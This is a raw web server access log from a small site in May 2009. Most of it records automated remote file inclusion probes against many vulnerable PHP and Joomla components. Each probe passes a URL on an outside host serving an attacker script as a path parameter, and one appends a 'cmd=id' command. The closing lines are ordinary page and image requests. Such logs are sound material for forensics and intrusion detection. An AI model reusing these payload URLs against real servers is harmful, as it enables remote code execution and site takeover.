61.81.17.108 - - [31/May/2009:16:55:19 -0400] "GET /log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 404 320
61.81.17.108 - - [31/May/2009:16:55:20 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 404 316
61.81.17.108 - - [31/May/2009:16:55:20 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 404 347
194.63.250.46 - - [31/May/2009:16:56:09 -0400] "GET //includes/functions_portal.php?phpbb_root_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 311
194.63.250.46 - - [31/May/2009:16:56:09 -0400] "GET /log//includes/functions_portal.php?phpbb_root_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 315
194.63.250.46 - - [31/May/2009:16:56:14 -0400] "GET /log/sdaglobal.org-access_log.1//includes/functions_portal.php?phpbb_root_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 342
194.63.250.46 - - [31/May/2009:16:58:34 -0400] "GET /log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 332
194.63.250.46 - - [31/May/2009:16:58:34 -0400] "GET /log/sdaglobal.org-access_log.1/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 359
194.63.250.46 - - [31/May/2009:16:58:40 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 328
194.63.250.46 - - [31/May/2009:16:58:43 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 328
194.63.250.46 - - [31/May/2009:16:58:44 -0400] "GET /log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 332
194.63.250.46 - - [31/May/2009:16:58:48 -0400] "GET /log/sdaglobal.org-access_log.1/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 359
194.63.250.46 - - [31/May/2009:16:59:39 -0400] "GET /log/sdaglobal.org-access_log//includes/functions_portal.php?phpbb_root_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 340
213.246.62.35 - - [31/May/2009:16:59:55 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 341
213.246.62.35 - - [31/May/2009:16:59:56 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 341
74.52.2.130 - - [31/May/2009:17:00:16 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 335
74.52.2.130 - - [31/May/2009:17:00:16 -0400] "GET /log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 339
74.52.2.130 - - [31/May/2009:17:00:19 -0400] "GET /log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 339
74.52.2.130 - - [31/May/2009:17:00:19 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 335
83.245.33.38 - - [31/May/2009:17:00:31 -0400] "GET /log//inc/header.php/step_one.php?server_inc=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 313
83.245.33.38 - - [31/May/2009:17:00:31 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//inc/header.php/step_one.php?server_inc=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 342
83.245.33.38 - - [31/May/2009:17:00:31 -0400] "GET //inc/header.php/step_one.php?server_inc=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 309
74.52.2.130 - - [31/May/2009:17:00:33 -0400] "GET /log/sdaglobal.org-access_log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 364
194.63.250.46 - - [31/May/2009:17:00:58 -0400] "GET /log/sdaglobal.org-access_log//includes/functions_portal.php?phpbb_root_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 340
83.245.33.38 - - [31/May/2009:17:01:09 -0400] "GET /log/sdaglobal.org-access_log.4//inc/header.php/step_one.php?server_inc=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 340
194.63.250.46 - - [31/May/2009:17:02:43 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 321
194.63.250.46 - - [31/May/2009:17:02:48 -0400] "GET /log/sdaglobal.org-access_log.4//doceboCms/class/class.dashboard_cms.php?where_framework=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 352
194.63.250.46 - - [31/May/2009:17:02:48 -0400] "GET /log//doceboCms/class/class.dashboard_cms.php?where_framework=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 325
194.63.250.46 - - [31/May/2009:17:02:49 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 354
194.63.250.46 - - [31/May/2009:17:02:54 -0400] "GET /log/sdaglobal.org-access_log%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 359
194.63.250.46 - - [31/May/2009:17:03:03 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 354
121.165.73.157 - - [31/May/2009:17:03:07 -0400] "GET /log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 339
121.165.73.157 - - [31/May/2009:17:03:07 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 335
194.63.250.46 - - [31/May/2009:17:03:38 -0400] "GET /log/sdaglobal.org-access_log.1//doceboCms/class/class.dashboard_cms.php?where_framework=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 352
121.165.73.157 - - [31/May/2009:17:03:40 -0400] "GET /log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 339
121.165.73.157 - - [31/May/2009:17:03:40 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 335
61.81.17.108 - - [31/May/2009:17:04:40 -0400] "GET /log/sdaglobal.org-access_log/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rsh.kiev.ua/dama/idfx1.txt? HTTP/1.1" 404 367
61.81.17.108 - - [31/May/2009:17:04:40 -0400] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rsh.kiev.ua/dama/idfx1.txt? HTTP/1.1" 404 338
61.81.17.108 - - [31/May/2009:17:04:42 -0400] "GET /log/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rsh.kiev.ua/dama/idfx1.txt? HTTP/1.1" 404 342
194.63.250.46 - - [31/May/2009:17:05:16 -0400] "GET /log/sdaglobal.org-error_log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 356
218.185.20.88 - - [31/May/2009:17:07:10 -0400] "GET //bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 312
218.185.20.88 - - [31/May/2009:17:07:10 -0400] "GET /log//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 316
218.185.20.88 - - [31/May/2009:17:07:10 -0400] "GET /log/sdaglobal.org-access_log//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 341
218.185.20.88 - - [31/May/2009:17:07:11 -0400] "GET //bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 312
218.185.20.88 - - [31/May/2009:17:07:11 -0400] "GET /log//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 316
218.185.20.88 - - [31/May/2009:17:07:12 -0400] "GET //bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 312
218.185.20.88 - - [31/May/2009:17:07:12 -0400] "GET /log//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 316
218.185.20.88 - - [31/May/2009:17:07:16 -0400] "GET //bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 312
218.185.20.88 - - [31/May/2009:17:07:16 -0400] "GET /log//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 316
218.185.20.88 - - [31/May/2009:17:07:16 -0400] "GET /log/sdaglobal.org-access_log//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 341
218.185.20.88 - - [31/May/2009:17:08:14 -0400] "GET /log/sdaglobal.org-access_log%20%20//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 343
218.185.20.88 - - [31/May/2009:17:08:18 -0400] "GET /log/sdaglobal.org-access_log%20%20//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 343
88.40.90.61 - - [31/May/2009:17:08:25 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/jembutzmu/31377os.txt? HTTP/1.1" 404 317
194.63.250.46 - - [31/May/2009:17:10:29 -0400] "GET /log/sdaglobal.org-access_log%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 359
61.81.17.108 - - [31/May/2009:17:10:57 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 404 349
219.85.63.226 - - [31/May/2009:17:12:09 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://tstk.org//ktmllite/images/upload/sh1.txt???? HTTP/1.1" 404 335
219.85.63.226 - - [31/May/2009:17:12:09 -0400] "GET /log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://tstk.org//ktmllite/images/upload/sh1.txt???? HTTP/1.1" 404 339
218.185.20.88 - - [31/May/2009:17:14:37 -0400] "GET //bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 312
218.185.20.88 - - [31/May/2009:17:14:37 -0400] "GET /log//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 316
218.185.20.88 - - [31/May/2009:17:14:57 -0400] "GET //bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 312
218.185.20.88 - - [31/May/2009:17:14:57 -0400] "GET /log//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 316
218.185.20.88 - - [31/May/2009:17:15:43 -0400] "GET /log/sdaglobal.org-access_log%20%20//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 343
218.185.20.88 - - [31/May/2009:17:15:54 -0400] "GET /log/sdaglobal.org-access_log%20%20//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 343
61.81.17.108 - - [31/May/2009:17:17:00 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 404 349
121.165.73.157 - - [31/May/2009:17:17:11 -0400] "GET /log/ministrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 345
121.165.73.157 - - [31/May/2009:17:17:12 -0400] "GET /ministrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 341
121.165.73.157 - - [31/May/2009:17:17:12 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/ministrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 374
121.165.73.157 - - [31/May/2009:17:17:40 -0400] "GET /ministrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 341
121.165.73.157 - - [31/May/2009:17:17:40 -0400] "GET /log/ministrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 345
121.165.73.157 - - [31/May/2009:17:17:44 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/ministrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 374
121.165.73.157 - - [31/May/2009:17:19:00 -0400] "GET /log/sdaglobal.org-access_log%20%20/ministrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 372
121.165.73.157 - - [31/May/2009:17:19:20 -0400] "GET /log/sdaglobal.org-access_log%20%20/ministrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 372
61.81.17.108 - - [31/May/2009:17:21:21 -0400] "GET /log/sdaglobal.org-access_log.4//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 404 347
218.185.20.88 - - [31/May/2009:17:21:41 -0400] "GET /log/sdaglobal.org-access_log//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 341
218.185.20.88 - - [31/May/2009:17:22:02 -0400] "GET /log/sdaglobal.org-access_log//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 341
194.63.250.46 - - [31/May/2009:17:22:19 -0400] "GET /log/sdaglobal.org-access_log.1//doceboCms/class/class.dashboard_cms.php?where_framework=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 352
194.63.250.46 - - [31/May/2009:17:22:48 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 361
222.239.76.25 - - [31/May/2009:17:24:26 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 315
222.239.76.25 - - [31/May/2009:17:24:26 -0400] "GET /log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 319
222.239.76.25 - - [31/May/2009:17:24:41 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 315
222.239.76.25 - - [31/May/2009:17:24:41 -0400] "GET /log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 319
194.63.250.46 - - [31/May/2009:17:27:46 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 361
69.10.135.205 - - [31/May/2009:17:27:56 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 325
69.10.135.205 - - [31/May/2009:17:27:56 -0400] "GET /log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 329
69.10.135.205 - - [31/May/2009:17:27:56 -0400] "GET /log/sdaglobal.org-access_log.1/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 356
69.10.135.205 - - [31/May/2009:17:28:00 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 325
69.10.135.205 - - [31/May/2009:17:28:00 -0400] "GET /log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 329
69.10.135.205 - - [31/May/2009:17:28:00 -0400] "GET /log/sdaglobal.org-access_log.1/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 356
194.63.250.46 - - [31/May/2009:17:28:16 -0400] "GET /log/sdaglobal.org-error_log.1//doceboCms/class/class.dashboard_cms.php?where_framework=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 351
69.10.135.205 - - [31/May/2009:17:28:22 -0400] "GET /log/sdaglobal.org-access_log.4/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 356
69.10.135.205 - - [31/May/2009:17:28:54 -0400] "GET /log/sdaglobal.org-access_log.4/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 356
222.239.76.25 - - [31/May/2009:17:33:44 -0400] "GET /log/sdaglobal.org-access_log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 344
218.234.23.43 - - [31/May/2009:17:33:47 -0400] "GET /?_zb_path=http://www.tkside.xpg.com.br/shika/spd.txt??? HTTP/1.1" 200 9432
218.234.23.43 - - [31/May/2009:17:33:47 -0400] "GET /log/sdaglobal.org-access_log/?_zb_path=http://www.tkside.xpg.com.br/shika/spd.txt??? HTTP/1.1" 404 310
218.234.23.43 - - [31/May/2009:17:33:47 -0400] "GET /log/sdaglobal.org-access_log.3/?_zb_path=http://www.tkside.xpg.com.br/shika/spd.txt??? HTTP/1.1" 404 312
218.234.23.43 - - [31/May/2009:17:33:47 -0400] "GET /log/?_zb_path=http://www.tkside.xpg.com.br/shika/spd.txt??? HTTP/1.1" 200 58358
194.63.250.46 - - [31/May/2009:17:34:22 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//?mosConfig_absolute_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 315
194.63.250.46 - - [31/May/2009:17:35:06 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//?mosConfig_absolute_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 315
218.234.23.43 - - [31/May/2009:17:36:57 -0400] "GET /log/sdaglobal.org-access_log%20/?_zb_path=http://www.tkside.xpg.com.br/shika/spd.txt??? HTTP/1.1" 404 311
213.246.62.35 - - [31/May/2009:17:38:54 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 325
213.246.62.35 - - [31/May/2009:17:38:54 -0400] "GET /log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 329
194.63.250.46 - - [31/May/2009:17:41:39 -0400] "GET /log/sdaglobal.org-error_log.4%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 360
69.94.125.100 - - [31/May/2009:17:41:41 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.curling-erfurt.de/media/id1.txt??? HTTP/1.1" 404 310
69.94.125.100 - - [31/May/2009:17:41:41 -0400] "GET /log/modules/My_eGallery/index.php?basepath=http://www.curling-erfurt.de/media/id1.txt??? HTTP/1.1" 404 314
69.94.125.100 - - [31/May/2009:17:41:47 -0400] "GET /log/modules/My_eGallery/index.php?basepath=http://www.curling-erfurt.de/media/id1.txt??? HTTP/1.1" 404 314
69.94.125.100 - - [31/May/2009:17:41:47 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.curling-erfurt.de/media/id1.txt??? HTTP/1.1" 404 310
217.147.29.190 - - [31/May/2009:17:44:00 -0400] "GET /modules/My_eGallery/index.php?basepath=http://www.curling-erfurt.de/media/id1.txt??? HTTP/1.1" 404 310
68.39.170.187 - - [31/May/2009:17:44:01 -0400] "GET /images/english.gif HTTP/1.1" 200 2582
68.39.170.187 - - [31/May/2009:17:44:01 -0400] "GET /images/chinese.gif HTTP/1.1" 200 3578
217.147.29.190 - - [31/May/2009:17:44:01 -0400] "GET /log/modules/My_eGallery/index.php?basepath=http://www.curling-erfurt.de/media/id1.txt??? HTTP/1.1" 404 314
194.63.250.46 - - [31/May/2009:17:46:07 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 361
70.84.212.26 - - [31/May/2009:17:47:14 -0400] "GET //?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 200 9432
70.84.212.26 - - [31/May/2009:17:47:14 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 315
70.84.212.26 - - [31/May/2009:17:47:14 -0400] "GET /log//?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 200 58362
70.84.212.26 - - [31/May/2009:17:49:39 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//?path%5Bdocroot%5D=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 315
194.63.250.46 - - [31/May/2009:17:50:35 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://stormpages.com/classicrose/fx29id.txt?? HTTP/1.1" 404 361
77.23.58.51 - - [31/May/2009:17:57:30 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ha.ckers.org/files/tool25.dat?&cmd=id HTTP/1.1" 404 331
71.132.217.156 - - [31/May/2009:17:58:00 -0400] "GET / HTTP/1.1" 200 9432
71.132.217.156 - - [31/May/2009:17:58:01 -0400] "GET /_themes/sda/lebkgnd.jpg HTTP/1.1" 200 4389
71.132.217.156 - - [31/May/2009:17:58:01 -0400] "GET /_derived/index.html_cmp_sda010_bnr.gif HTTP/1.1" 200 9017
71.132.217.156 - - [31/May/2009:17:58:01 -0400] "GET /images/select.gif HTTP/1.1" 200 1792
71.132.217.156 - - [31/May/2009:17:58:01 -0400] "GET /images/chinese.gif HTTP/1.1" 200 3578
71.132.217.156 - - [31/May/2009:17:58:01 -0400] "GET /images/english.gif HTTP/1.1" 200 2582
71.132.217.156 - - [31/May/2009:17:58:01 -0400] "GET /images/welcome.gif HTTP/1.1" 200 2565
71.132.217.156 - - [31/May/2009:17:58:02 -0400] "GET /images/china.gif HTTP/1.1" 200 3479
71.132.217.156 - - [31/May/2009:17:58:02 -0400] "GET /images/czech.gif HTTP/1.1" 200 1137
71.132.217.156 - - [31/May/2009:17:58:02 -0400] "GET /images/france.gif HTTP/1.1" 200 1094
71.132.217.156 - - [31/May/2009:17:58:02 -0400] "GET /images/germany.gif HTTP/1.1" 200 986
71.132.217.156 - - [31/May/2009:17:58:02 -0400] "GET /images/filipino.gif HTTP/1.1" 200 1328
71.132.217.156 - - [31/May/2009:17:58:02 -0400] "GET /images/hungary.gif HTTP/1.1" 200 1115
71.132.217.156 - - [31/May/2009:17:58:02 -0400] "GET /images/italy.gif HTTP/1.1" 200 1095
